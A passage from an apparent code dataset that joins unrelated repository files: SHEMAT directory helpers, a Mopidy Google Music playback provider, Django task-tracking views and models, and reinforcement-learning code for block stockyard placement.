outdir = (os.environ['HOME'] + "/shematOutputDir/" + model_name +
"_output")
# Rename root-date-directory
if os.path.exists(outdir + "/" + old_dat):
os.rename(outdir + "/" + old_dat, outdir + "/" + new_dat)
else:
raise RuntimeError("Directory does not exist: \n" + outdir + "/" +
old_dat)
# Rename dates in subdirectories
subdirs_old = os.listdir(outdir + "/" + new_dat)
subdirs_new = [subdir.replace(old_dat, new_dat) for subdir in subdirs_old]
for i in range(len(subdirs_old)):
os.rename(outdir + "/" + new_dat + "/" + subdirs_old[i],
outdir + "/" + new_dat + "/" + subdirs_new[i])
#############################################################
# MAKE FILE/DIR NAMES
#############################################################
def make_file_dir_names(model_name, nt=0):
"""
Export file and directory names which contain model_name.
Indices of exported files/directories:
0 - model_name_big
1 - model_dir
2 - input_file
3 - enkf_input_file
4 - true_input_file
5 - true_sgsim_file
6 - sgsim_file
7 - true_log_file
8 - log_file
9 - shell_output_file
10 - init_dist_file_one
11 - init_dist_file_two
12 - init_dist_file_three
13 - observations_file
14 - true_file
15 - true_chem_file
16 - monitor_file
17 - time_out_file
18 - assim_out_file_bef
19 - assim_out_file_aft
"""
model_name_big = model_name.upper()
model_dir = os.environ['HOME'] + "/shematModelsDir/" + model_name + "_model"
input_file = model_name_big
enkf_input_file = model_name_big + ".enkf"
true_input_file = model_name_big + "_TRUE"
true_sgsim_file = "sgsim_k_" + model_name + "_true.par"
sgsim_file = "sgsim_k_" + model_name + ".par"
true_log_file = "logk_" + model_name + "_true.dat"
log_file = "logk_" + model_name + ".dat"
shell_output_file = model_name + ".out"
init_dist_file_one = "init_dist_" + model_name + "_1.dat"
init_dist_file_two = "init_dist_" + model_name + "_2.dat"
init_dist_file_three = "init_dist_" + model_name + "_3.dat"
observations_file = "observations_" + model_name_big + ".dat"
true_file = "True" + model_name_big + ".plt"
true_chem_file = "True" + model_name_big + "_chem.plt"
monitor_file = model_name_big + '_E0_monitor_1.dat'
time_out_file = model_name_big + '_E0_time_out_' + str(nt) + '.vtk'
assim_out_file_bef = 'assim_variables_E1_bef_' + str(nt).zfill(4) + '.vtk'
assim_out_file_aft = 'assim_variables_E1_aft_' + str(nt).zfill(4) + '.vtk'
return model_name_big, \
model_dir, \
input_file, \
enkf_input_file, \
true_input_file,\
true_sgsim_file, \
sgsim_file, \
true_log_file, \
log_file, \
shell_output_file, \
init_dist_file_one, \
init_dist_file_two, \
init_dist_file_three, \
observations_file, \
true_file, \
true_chem_file,\
monitor_file,\
time_out_file,\
assim_out_file_bef,\
assim_out_file_aft
#############################################################
# MAKE TMP MODEL DIR
#############################################################
def make_model_dir_tmp(model_name, letter, today):
os.chdir(os.environ['HOME'] + "/shematModelsDir")
# Copy everything to temporal directory
model_dir_name = model_name + '_model_' + today + '_' + letter
new_model_dir = os.environ['HOME'] + "/shematModelsDir/" + model_dir_name
trash_model_dir = os.environ['HOME'] + "/.Trash/" + model_dir_name
trash_model_dir_2 = os.environ['HOME'] + "/.Trash/" + model_dir_name + '_2'
# Check if new_model_dir already exists
if os.path.isdir(new_model_dir):
os.chdir(pm.python_dir)
# _2 dir in .Trash exists: Kill it (should be killable by now)
if os.path.isdir(trash_model_dir_2):
shutil.rmtree(trash_model_dir_2)
# dir in .Trash exists: Rename it to _2 dir in .Trash
if os.path.isdir(trash_model_dir):
os.rename(trash_model_dir, trash_model_dir_2)
# Move old new_model_dir to .Trash
shutil.move(new_model_dir, os.environ['HOME'] + "/.Trash")
shutil.copytree(
os.environ['HOME'] + "/shematModelsDir/" + model_name + '_model',
new_model_dir)
os.chdir(new_model_dir)
# Change the directory inside clean_out, move_output
replace_string('clean_output.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('py_clean_output.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('compilequick.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('generateobs.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('generatetecmon.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('generatetrues.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('move_output.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('py_move_output.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('py_move_less_output.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
replace_string('py_compilequick.sh', '/' + model_name + '_model',
'/' + model_name + '_model_' + today + '_' + letter)
os.chmod('clean_output.sh', 128 + 256 + 64)
os.chmod('py_clean_output.sh', 128 + 256 + 64)
os.chmod('compilequick.sh', 128 + 256 + 64)
os.chmod('generateobs.sh', 128 + 256 + 64)
os.chmod('generatetrues.sh', 128 + 256 + 64)
os.chmod('generatetecmon.sh', 128 + 256 + 64)
os.chmod('move_output.sh', 128 + 256 + 64)
os.chmod('py_move_output.sh', 128 + 256 + 64)
os.chmod('py_move_less_output.sh', 128 + 256 + 64)
os.chmod('py_compilequick.sh', 128 + 256 + 64)
os.chmod('veryclean.sh', 128 + 256 + 64)
return new_model_dir
def delete_model_dir_tmp(model_dir):
# Delete the temporal directory
shutil.rmtree(model_dir)
``` |
{
"source": "jjok/mopidy-gmusic",
"score": 2
} |
#### File: mopidy-gmusic/mopidy_gmusic/playback.py
```python
import logging
from mopidy import backend
logger = logging.getLogger(__name__)
BITRATES = {
128: "low",
160: "med",
320: "hi",
}
class GMusicPlaybackProvider(backend.PlaybackProvider):
def translate_uri(self, uri):
track_id = uri.rsplit(":")[-1]
quality = BITRATES[self.backend.config["gmusic"]["bitrate"]]
stream_uri = self.backend.session.get_stream_url(
track_id, quality=quality
)
logger.debug("Translated: %s -> %s", uri, stream_uri)
return stream_uri
``` |
{
"source": "jjolivares/improllow-up",
"score": 2
} |
#### File: customers/cbv_base/DeleteView.py
```python
from django.core.urlresolvers import reverse
from django.views.generic import DeleteView
from django.contrib import messages
class DeleteViewBase(DeleteView):
url_name = ""
template_name = 'base/templates/cbv/base/DeleteViewCustom.html'
class DeleteViewCustom(DeleteViewBase):
def get_success_url(self):
messages.add_message(self.request, messages.INFO, 'Suppression effectuée')
return reverse(self.success_url)
def get_context_data(self, **kwargs):
context = super(DeleteViewCustom, self).get_context_data(**kwargs)
model_name = self.model._meta.verbose_name.title()
context['model_name'] = model_name
context['url_name'] = self.url_name
return context
```
#### File: improllow-up/customers/models.py
```python
from django.db import models
class BaseModel(models.Model):
created = models.DateTimeField(
auto_now_add = True,
verbose_name="Date de création"
)
modified = models.DateTimeField(
auto_now = True,
verbose_name="Date de modification"
)
class Meta:
abstract = True
ordering = ("-created", )
class Customer(BaseModel):
corporate_name = models.CharField(
max_length = 255,
verbose_name = "Nom"
)
def __str__(self):
return self.corporate_name
```
#### File: improllow-up/customers/views.py
```python
from django.shortcuts import render
from django.shortcuts import get_object_or_404
from django.db.models import Count
from projects.models import Project
from tasks.models import Task
from .models import Customer
def detail(request, pk):
customer = get_object_or_404(Customer, pk=pk)
project_id_list = Project.objects.filter(
customer=customer
).values_list(
'id',
flat=True
).distinct()
task_list = Task.objects.filter(project__in=project_id_list)
task_list = task_list.values('project').annotate(
total=Count('project')
).order_by('-total')
count_task_list = []
for task in task_list:
count_task_list.append({
'total' : task['total'],
'project':Project.objects.get(id=task['project'])
})
task_list = Task.objects.filter(
project__in = project_id_list,
execution_date__isnull = False
).order_by('-execution_date')[:8]
return render(
request,
'customers/detail.html',
{
'customer' : customer,
'count_task_list' : count_task_list,
'task_list' : task_list,
}
)
```
#### File: improllow-up/users/views.py
```python
import json
import datetime
import csv
from django.shortcuts import render
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect, HttpResponse, JsonResponse
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.db.models import Q, Count, Sum
from django.core import serializers
from tasks.models import Task
from .models import UserProfile
from .forms import FormConnection, TimeRangeForm
def connection(request):
"""
Cette view permet aux utilisateurs de se connecter
"""
form = FormConnection()
if request.POST:
form = FormConnection(request.POST)
if form.is_valid():
username = form.cleaned_data["username"]
password = <PASSWORD>.cleaned_data["password"]
user = authenticate(username=username, password=password)
if user:
login(request, user)
if request.GET.get('next') is not None:
return HttpResponseRedirect(reverse(request.GET['next']))
else:
return HttpResponseRedirect(reverse('users:list'))
return render(request, 'users/connection.html', {'form' : form})
def logout_user(request):
logout(request)
return HttpResponseRedirect(reverse('login'))
def detail(request, pk):
userprofile = get_object_or_404(UserProfile, pk=pk)
task_list = Task.objects.filter(
Q(userprofile=userprofile) |
Q(user_add=userprofile)
)
paginator = Paginator(task_list, 10)
page = request.GET.get('page')
try:
task_list_page = paginator.page(page)
except PageNotAnInteger:
task_list_page = paginator.page(1)
except EmptyPage:
task_list_page = paginator.page(paginator.num_pages)
task_to_do = Task.objects.filter(
userprofile = userprofile,
execution_date__isnull = True
).order_by('-execution_date')[:10]
form = TimeRangeForm()
return render(
request,
'users/detail.html',
{
'userprofile' : userprofile,
'task_list_page' : task_list_page,
'task_to_do' : task_to_do,
'form' : form,
}
)
def repartition_task_base(userprofile, start, end):
data_list = Task.objects.filter(
userprofile=userprofile,
duration__gt=0,
execution_date__isnull=False
)
if start and end:
start_date = datetime.datetime.strptime(start, "%Y-%m-%d")
end_date = datetime.datetime.strptime(end, "%Y-%m-%d")
data_list = data_list.filter(
execution_date__gte = start,
execution_date__lte = end
)
return data_list
def repartition_project(request, pk, start=None, end=None):
userprofile = get_object_or_404(UserProfile, pk=pk)
data_list = repartition_task_base(userprofile, start, end)
data_list = data_list.values('project__name').annotate(duration_sum=Sum('duration')).order_by()
data_list = list(data_list)
return JsonResponse(json.dumps(data_list), safe=False)
def export_csv(request, pk, start=None, end=None):
userprofile = get_object_or_404(UserProfile, pk=pk)
start_date = datetime.datetime.strptime(start, "%Y-%m-%d")
end_date = datetime.datetime.strptime(end, "%Y-%m-%d")
data_list = Task.objects.filter(
userprofile=userprofile,
duration__gt=0,
execution_date__gte = start,
execution_date__lte = end
).order_by('execution_date')
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="'+str(userprofile)+'.csv"'
writer = csv.writer(response, delimiter=';')
field_names = ['Date', 'Projet', 'Tâche', 'Durée', 'Type']
writer.writerow(field_names)
for obj in data_list:
row_list = [
str(obj.execution_date),
str(obj.project),
obj.name,
str(obj.duration),
str(obj.task_type)
]
new_row_list = []
for i in row_list:
if i == 'None':
new_row_list.append('')
else:
new_row_list.append(i)
writer.writerow(new_row_list)
return response
def repartition_temps(request, pk, start=None, end=None):
userprofile = get_object_or_404(UserProfile, pk=pk)
data_list = repartition_task_base(userprofile, start, end)
data_list = data_list.values('task_type__name').annotate(duration_sum=Sum('duration')).order_by()
data_list = list(data_list)
return JsonResponse(json.dumps(data_list), safe=False)
``` |
{
"source": "jjolla93/Block_Stockyard",
"score": 2
} |
#### File: Block_Stockyard/model/helper.py
```python
import numpy as np
import random
import tensorflow as tf
import matplotlib.pyplot as plt
import scipy.misc
import os
import csv
import itertools
import tensorflow.contrib.slim as slim
# This is a simple function to reshape our game frames.
def processState(state1):
return np.reshape(state1, [21168])
# These functions allows us to update the parameters of our target network with those of the primary network.
def updateTargetGraph(tfVars, tau):
total_vars = len(tfVars)
op_holder = []
for idx, var in enumerate(tfVars[0:total_vars // 2]):
op_holder.append(tfVars[idx + total_vars // 2].assign(
(var.value() * tau) + ((1 - tau) * tfVars[idx + total_vars // 2].value())))
return op_holder
def updateTarget(op_holder, sess):
for op in op_holder:
sess.run(op)
total_vars = len(tf.trainable_variables())
a = tf.trainable_variables()[0].eval(session=sess)
b = tf.trainable_variables()[total_vars // 2].eval(session=sess)
if a.all() == b.all():
print("Target Set Success")
else:
print("Target Set Failed")
# Record performance metrics and episode logs for the Control Center.
def saveToCenter(i, rList, jList, bufferArray, summaryLength, h_size, sess, mainQN, time_per_step):
with open('./Center/log.csv', 'a') as myfile:
state_display = (np.zeros([1, h_size]), np.zeros([1, h_size]))
imagesS = []
for idx, z in enumerate(np.vstack(bufferArray[:, 0])):
img, state_display = sess.run([mainQN.salience, mainQN.rnn_state], \
feed_dict={
mainQN.scalarInput: np.reshape(bufferArray[idx, 0], [1, 21168]) / 255.0, \
mainQN.trainLength: 1, mainQN.state_in: state_display,
mainQN.batch_size: 1})
imagesS.append(img)
imagesS = (imagesS - np.min(imagesS)) / (np.max(imagesS) - np.min(imagesS))
imagesS = np.vstack(imagesS)
imagesS = np.resize(imagesS, [len(imagesS), 84, 84, 3])
luminance = np.max(imagesS, 3)
imagesS = np.multiply(np.ones([len(imagesS), 84, 84, 3]), np.reshape(luminance, [len(imagesS), 84, 84, 1]))
make_gif(np.ones([len(imagesS), 84, 84, 3]), './Center/frames/sal' + str(i) + '.gif',
duration=len(imagesS) * time_per_step, true_image=False, salience=True, salIMGS=luminance)
images = zip(bufferArray[:, 0])
images.append(bufferArray[-1, 3])
images = np.vstack(images)
images = np.resize(images, [len(images), 84, 84, 3])
make_gif(images, './Center/frames/image' + str(i) + '.gif', duration=len(images) * time_per_step,
true_image=True, salience=False)
wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
wr.writerow([i, np.mean(jList[-100:]), np.mean(rList[-summaryLength:]), './frames/image' + str(i) + '.gif',
'./frames/log' + str(i) + '.csv', './frames/sal' + str(i) + '.gif'])
myfile.close()
with open('./Center/frames/log' + str(i) + '.csv', 'w') as myfile:
state_train = (np.zeros([1, h_size]), np.zeros([1, h_size]))
wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
wr.writerow(["ACTION", "REWARD", "A0", "A1", 'A2', 'A3', 'V'])
a, v = sess.run([mainQN.Advantage, mainQN.Value], \
feed_dict={mainQN.scalarInput: np.vstack(bufferArray[:, 0]) / 255.0,
mainQN.trainLength: len(bufferArray), mainQN.state_in: state_train,
mainQN.batch_size: 1})
wr.writerows(zip(bufferArray[:, 1], bufferArray[:, 2], a[:, 0], a[:, 1], a[:, 2], a[:, 3], v[:, 0]))
# This code allows gifs to be saved of the training episode for use in the Control Center.
def make_gif(images, fname, duration=2, true_image=False, salience=False, salIMGS=None):
import moviepy.editor as mpy
def make_frame(t):
try:
x = images[int(len(images) / duration * t)]
except:
x = images[-1]
if true_image:
return x.astype(np.uint8)
else:
return ((x + 1) / 2 * 255).astype(np.uint8)
def make_mask(t):
try:
x = salIMGS[int(len(salIMGS) / duration * t)]
except:
x = salIMGS[-1]
return x
txtClip = mpy.TextClip('.', color='white', font="Amiri-Bold",
kerning=5, fontsize=10)
clip = mpy.VideoClip(make_frame, duration=duration)
clip = mpy.CompositeVideoClip([clip, txtClip])
clip.duration = duration
if salience == True:
mask = mpy.VideoClip(make_mask, ismask=True, duration=duration)
clipB = clip.set_mask(mask)
clipB = clip.set_opacity(0)
mask = mask.set_opacity(0.1)
mask.write_gif(fname, fps=len(images) / duration, verbose=False)
# clipB.write_gif(fname, fps = len(images) / duration,verbose=False)
else:
clip.write_gif(fname, fps=len(images) / duration, verbose=False)
def make_gif_with_count(images, counts, fname, duration=2, true_image=False, salience=False, salIMGS=None):
import moviepy.editor as mpy
def make_frame(t):
try:
x = images[int(len(images) / duration * t)]
except:
x = images[-1]
if true_image:
return x.astype(np.uint8)
else:
return ((x + 1) / 2 * 255).astype(np.uint8)
def make_mask(t):
try:
x = salIMGS[int(len(salIMGS) / duration * t)]
except:
x = salIMGS[-1]
return x
clips = []
num_frame = len(images)
for f in range(num_frame):
txtClip = mpy.TextClip(str(counts[f]), color='white', font="Amiri-Bold",
kerning=5, fontsize=10)
_clip = mpy.ImageClip(images[f])
_clip = mpy.CompositeVideoClip([_clip, txtClip])
_clip.duration = duration/num_frame
clips.append(_clip)
clip = mpy.concatenate(clips)
if salience == True:
mask = mpy.VideoClip(make_mask, ismask=True, duration=duration)
clipB = clip.set_mask(mask)
clipB = clip.set_opacity(0)
mask = mask.set_opacity(0.1)
mask.write_gif(fname, fps=len(images) / duration, verbose=False)
# clipB.write_gif(fname, fps = len(images) / duration,verbose=False)
else:
clip.write_gif(fname, fps=len(images) / duration, verbose=False)
def color_frame(images, dim=2):
color_map = {
-1: [0, 0, 0],
-2: [100, 0, 0],
0: [255, 0, 0],
1: [0, 255, 0],
2: [255, 255, 0],
3: [0, 150, 150],
4: [0, 0, 255],
5: [0, 0, 255],
6: [0, 0, 255],
7: [0, 0, 255],
8: [0, 0, 255]
}
if dim == 2:
colored_images = np.zeros([len(images), images.shape[1], images.shape[2], 3])
for k in range(len(images)):
for i in range(images.shape[1]):
for j in range(images.shape[2]):
colored_images[k, i, j] = color_map[int(images[k, i, j])]
return colored_images
def color_frame_continuous(images, dim=2):
if dim == 2:
colored_images = np.zeros([len(images), images.shape[1], images.shape[2], 3])
for k in range(len(images)):
for i in range(images.shape[1]):
for j in range(images.shape[2]):
if images[k, i, j] == -1.0:
colored_images[k, i, j] = [0, 0, 0]
else:
colored_images[k, i, j] = [255, min(255, 0.5 * 255 * images[k, i, j]), 0]
return colored_images
```
#### File: Block_Stockyard/model/heuristic_abslap.py
```python
from simulater import DataManager
from model.trained_transporter import Transporter
import operator
import numpy as np
import tensorflow as tf
class HeuristicABSLAP(object):
def __init__(self, path, width=5, height=5):
# 입력 데이터 가져오기 및 멤버변수 저장
space, blocks = DataManager.import_data_from_csv(path, width, height)
self.num_block = len(blocks)
self.blocks = sorted(blocks, key=operator.attrgetter('_startdate'))
self.height = space.height
self.width = space.width
self.rearrange = 0
sess = tf.Session()
self.transporter = Transporter(sess, width, height, mode=0)
def arrange_blocks(self):
yard = np.full([self.height, self.width], 0) #적치장의 각 지번 0으로 초기화 함. 여기에 값 채워서 계산
current_date = None
#블록을 하나씩 투입, 후보 지번들을 찾고 비용이 최소인 지번을 선택
for block in self.blocks:
schedule = block.get_schedule()
if current_date:
days = (schedule[0] - current_date).days
#다음 블록 투입시에 적치된 블록들의 잔여일을 업데이트
self.update_state(yard, days)
current_date = schedule[0]
candidates = self.get_candidates(yard)
candidate = self.choose_candidate(yard, candidates)
yard[candidate // yard.shape[1], candidate % yard.shape[1]] = block.term
print(yard)
#블록 투입이 끝난 이후 남은 블록들을 하나씩 반출
while np.sum(yard) != 0:
self.update_state(yard, np.min(yard[np.nonzero(yard)]))
positions = [] # 결정된 각 블록의 배치 지번을 리스트로 출력
return positions
def get_candidates(self, state, exception=[]):
candidates = []
for i, row in enumerate(state):
if sum(row) == 0:
#candidates.append(state.shape[1] * i + state.shape[0] // 2)
candidates.append(state.shape[1] * i)
for j, val in enumerate(row):
if j == 0:
continue
if (i, j) in exception:
continue
if val == 0 and row[j - 1] != 0:
candidates.append(state.shape[1] * i + j)
#이웃하는 후보 지번이 두 개 이상 있으면 후보에서 제거
num = len(candidates)
for i, candidate in enumerate(candidates[::-1]):
adjacent = 0
if candidate - 1 in candidates:
adjacent += 1
if candidate + 1 in candidates:
adjacent += 1
if candidate - state.shape[1] in candidates:
adjacent += 1
if candidate + state.shape[1] in candidates:
adjacent += 1
if adjacent >= 2:
del candidates[num - i - 1]
return candidates
def update_state(self, state, days):
outbounds = []
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i, j] == 0:
continue
elif state[i, j] > days:
state[i, j] -= days
else:
#잔여일이 0이하가 되는 블록들은 반출 블록 리스트에 추가
outbounds.append((i, j))
state[i, j] = 0
for outbound in outbounds:
self.checked = []
self.checked.append(outbound)
#outbound 블록이 반출이 가능한지를 확인하고 불가능한 경우에 재배치 수행
#if not self.check_outbound(state, outbound):
# self.rearrange_block(state, outbound)
#Transporting agent를 활용하여 재배치 수행
if outbounds:
self.rearrange_by_transporter(state, outbounds)
def choose_candidate(self, state, candidates, block=None):
cost = float('inf')
min_candidate = -1
for candidate in candidates:
if block:
_cost = abs(block[0] - candidate // state.shape[1]) + abs(block[1] - candidate % state.shape[1])
else:
_cost = (candidate - 1) % state.shape[1]
if _cost < cost:
min_candidate = candidate
cost = _cost
return min_candidate
def rearrange_block(self, state, block):
target_i, target_j = block[0], block[1]
print(state)
for i in range(1, state.shape[1] - target_j):
if state[target_i, target_j + i] != 0:
candidates = self.get_candidates(state, [(target_i, target_j + i + 1)])
candidate = self.choose_candidate(state, candidates, block)
state[candidate // state.shape[1], candidate % state.shape[1]] = state[target_i, target_j + i]
state[target_i, target_j + i] = 0
self.rearrange += 1
print('rearrange: {0}'.format(self.rearrange))
print(state)
def rearrange_by_transporter(self, state, outbounds):
blocks = []
out_indices = []
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i, j] != 0:
blocks.append((j, i))
for outbound in outbounds:
out_indices.append(len(blocks))
blocks.append((outbound[1], outbound[0]))
blocks_clone = blocks[:]
for index in out_indices:
moves, moved_blocks = self.transporter.get_block_moves(blocks, index, 0)
blocks = moved_blocks
self.rearrange += moves
print('moves: {0}'.format(self.rearrange))
new_state = np.full(state.shape, 0)
for i, block in enumerate(blocks_clone):
new_state[blocks[i][1], blocks[i][0]] = state[block[1], block[0]]
state[:] = new_state
def check_outbound(self, state, block):
if block[1] == state.shape[1] - 1:
return True
directions = [(1, 0), (0, -1), (-1, 0), (0, 1)]
for i in range(4):
search = (block[0] + directions[i][0], block[1] + directions[i][1])
if 0 <= search[0] < state.shape[0] and 0 <= search[1] < state.shape[1]:
if state[search[0], search[1]] != 0 or search in self.checked:
continue
else:
self.checked.append(search)
if self.check_outbound(state, search):
return True
return False
if __name__ == "__main__":
abslap = HeuristicABSLAP('../data/data.csv')
arranged = abslap.arrange_blocks()
print(arranged)
```
#### File: Block_Stockyard/model/QLearningDNN.py
```python
import numpy as np
import random
import tensorflow as tf
import matplotlib.pyplot as plt
from simulater import Environment as en
from view import ArrayView as av
import sys
import argparse
from collections import deque
import time
class QDNN:
def __init__(self, input_size, output_size, session, name):
self.session=session
self.input_size=input_size
self.output_size=output_size
self.net_name= name
self._build_network()
logdir = "../logs"
self.writer = tf.summary.FileWriter(logdir, session.graph)
#self.writer.add_graph(session.graph)
self.global_step=0
def _build_network(self, h_size=256, l_rate=1e-3):
with tf.variable_scope(self.net_name):
self._X=tf.placeholder(tf.float32, [None, self.input_size], name="input_x")
with tf.name_scope("layer1") as scope:
W1=tf.get_variable("W1", shape=[self.input_size, h_size], initializer=tf.contrib.layers.xavier_initializer())
b1=tf.get_variable("b1", shape=[1, h_size], initializer=tf.contrib.layers.xavier_initializer())
layer1=tf.nn.relu(tf.matmul(self._X, W1)+b1)
#w1_hist = tf.summary.histogram("weights1", W1)
#layer1_hist = tf.summary.histogram("layer1", layer1)
with tf.name_scope("layer2") as scope:
W2=tf.get_variable("W2", shape=[h_size, h_size], initializer=tf.contrib.layers.xavier_initializer())
b2=tf.get_variable("b2", shape=[1, h_size], initializer=tf.contrib.layers.xavier_initializer())
layer2=tf.nn.relu(tf.matmul(layer1, W2)+b2)
#w2_hist = tf.summary.histogram("weights2", W2)
#layer2_hist = tf.summary.histogram("layer2", layer2)
'''
with tf.name_scope("layer3") as scope:
W3=tf.get_variable("W3", shape=[h_size, h_size], initializer=tf.contrib.layers.xavier_initializer())
b3=tf.get_variable("b3", shape=[1, h_size], initializer=tf.contrib.layers.xavier_initializer())
layer3=tf.nn.relu(tf.matmul(layer2, W3)+b3)
#w3_hist = tf.summary.histogram("weights3", W3)
#layer3_hist = tf.summary.histogram("layer3", layer3)
with tf.name_scope("layer4") as scope:
W4=tf.get_variable("W4", shape=[h_size, h_size], initializer=tf.contrib.layers.xavier_initializer())
b4=tf.get_variable("b4", shape=[1, h_size], initializer=tf.contrib.layers.xavier_initializer())
layer4=tf.nn.relu(tf.matmul(layer3, W4)+b4)
#w4_hist = tf.summary.histogram("weights4", W4)
#layer4_hist = tf.summary.histogram("layer4", layer4)
'''
with tf.name_scope("layer5") as scope:
W5 = tf.get_variable("W5", shape=[h_size, self.output_size],
initializer=tf.contrib.layers.xavier_initializer())
b5 = tf.get_variable("b5", shape=[1, self.output_size], initializer=tf.contrib.layers.xavier_initializer())
self._Qpred = tf.matmul(layer2, W5)+b5
#w5_hist = tf.summary.histogram("weights5", W5)
#qpred_hist = tf.summary.histogram("qpred", self._Qpred)
self._Y = tf.placeholder(shape=[None, self.output_size], dtype=tf.float32)
self._loss = tf.reduce_mean(tf.square(self._Y - self._Qpred))
#loss_sum = tf.summary.scalar("loss", self._loss)
self._train = tf.train.AdamOptimizer(learning_rate=l_rate).minimize(self._loss)
#self.summary = tf.summary.merge_all()
def predict(self, state):
x = np.reshape(state, [1, self.input_size])
return self.session.run(self._Qpred, feed_dict={self._X: x})
def update(self, x_stack, y_stack):
loss, train = self.session.run([self._loss, self._train],
feed_dict={self._X: x_stack, self._Y: y_stack})
#loss, train, summary = self.session.run([self._loss, self._train, self.summary], feed_dict={self._X: x_stack, self._Y: y_stack})
#self.writer.add_summary(summary, global_step=self.global_step)
self.global_step+=1
return loss, train
def get_copy_var_ops(*, dest_scope_name="target", src_scope_name="main"):
op_holder = []
src_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=src_scope_name)
dest_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=dest_scope_name)
for src_var, dest_var in zip(src_vars, dest_vars):
op_holder.append(dest_var.assign(src_var.value()))
return op_holder
def run_training():
path="../data/data.csv"
env = en.Environment(path)
y = .99
e = 0.01
num_episodes = 50000
REPLAY_MEMORY = 100000
# create lists to contain total rewards and steps per episode
jList = []
rList = []
input_size=env.size
output_size=env.size
replay_buffer= deque()
with tf.Session() as sess:
mainDQN = QDNN(input_size, output_size, sess, "main")
targetDQN = QDNN(input_size, output_size, sess, "target")
tf.global_variables_initializer().run()
copy_ops = get_copy_var_ops(dest_scope_name="target", src_scope_name="main")
t0=time.time()
for i in range(num_episodes):
# Reset environment and get first new observation
s = env.reset()
e=1./((i/50)+1)+0.007
rAll = 0
d = False
j = 0
# The Q-Network
while j < len(env.BLOCKS):
# Choose an action by greedily (with e chance of random action) from the Q-network
s0 = [item/env.BLOCKS[j].term for item in s]
Qs = mainDQN.predict(s0)
#for k in range(len(s0[0])):
#if s0[0][k] != 0:
#Qs[0][k] = -100.0
a = np.argmax(Qs)
if np.random.rand(1) <e:
a = random.randint(0, input_size-1)
# Get new state and reward from environment
s1, r, d = env.step(a)
#s1 = np.reshape(s1, (1, s1.size))
if j<len(env.BLOCKS)-1:
s2 = [item/env.BLOCKS[j+1].term for item in s1]
else:
s2 = s1
#Save experience to buffer
replay_buffer.append((s0, a, r, s2, d))
if len(replay_buffer) > REPLAY_MEMORY:
replay_buffer.popleft()
rAll += r
s = s1
if d == True:
#rAll=-1
break
j += 1
jList.append(j)
rList.append(rAll)
print("Episode: {} steps: {} reward: {}".format(i, j, rAll))
if i % 10 == 9:
for _ in range(10):
# minibatch 생성
minibatch = random.sample(replay_buffer, 10)
loss, _ = replay_train(mainDQN, targetDQN, minibatch)
print("Loss: ", loss)
t1=time.time()
print("Seconds: %s" %(t1-t0))
t0=t1
sess.run(copy_ops)
bot_play(mainDQN, path)
num_finish = 0
for j in jList:
if (j == len(env.BLOCKS)): num_finish += 1
print("Percent of succesful episodes: " + str(100*num_finish / num_episodes) + "%")
# av.visualize_space(env.LOGS[0])
plt.plot(rList, label='reward')
plt.plot(jList, label='steps')
plt.legend(bbox_to_anchor=(0.78, 0.98), loc=2, borderaxespad=0.)
plt.show()
if(len(env.LOGS)>0):
env.LOGS=sorted(env.LOGS, key=lambda log: log[-1])[::-1]
av.visualize_log(env.LOGS)
def bot_play(mainDQN, path):
env = en.Environment(path)
s=env.reset()
reward_sum = 0
j=0
while True:
a = np.argmax(mainDQN.predict(s))
s, reward, done= env.step(a)
reward_sum += reward
if done:
print("Total score: {}".format(reward_sum))
break
elif j==len(env.BLOCKS)-1:
print("Total score: {}".format(reward_sum))
break
j+=1
def replay_train(DQN, targetDQN, train_batch):
x_stack=np.empty(0).reshape(0, DQN.input_size)
y_stack = np.empty(0).reshape(0, DQN.output_size)
for state, action, reward, next_state, done in train_batch:
dis=.9
Q=DQN.predict(state)
if(done):
Q[0, action] = reward
else:
Q[0, action] = reward + dis*np.max(targetDQN.predict(next_state))
y_stack = np.vstack([y_stack, Q])
x_stack = np.vstack([x_stack, state])
return DQN.update(x_stack, y_stack)
def simple_replay_train(DQN, train_batch):
x_stack=np.empty(0).reshape(0, DQN.input_size)
y_stack = np.empty(0).reshape(0, DQN.output_size)
for state, action, reward, next_state, done in train_batch:
dis=.9
Q=DQN.predict(state)
if(done):
Q[0, action] = reward
else:
Q[0, action] = reward + dis*np.max(DQN.predict(next_state))
y_stack = np.vstack([y_stack, Q])
x_stack = np.vstack([x_stack, state])
return DQN.update(x_stack, y_stack)
def main(_):
run_training()
if __name__ == '__main__':
tf.app.run(main=main)
```
#### File: Block_Stockyard/model/trained_transporter.py
```python
import tensorflow as tf
import tensorflow.contrib.slim as slim
import scipy.signal
import numpy as np
from simulater.InNOutSpace import Space
from model.helper import *
def update_target_graph(from_scope,to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var,to_var in zip(from_vars,to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
# Processes Doom screen image to produce cropped and resized image.
def process_frame(frame):
'''
s = frame[10:-10,30:-30]
s = scipy.misc.imresize(s,[84,84])
s = np.reshape(s,[np.prod(s.shape)]) / 255.0
'''
s = frame.flatten()
return s
# Discounting function used to calculate discounted returns.
def discount(x, gamma):
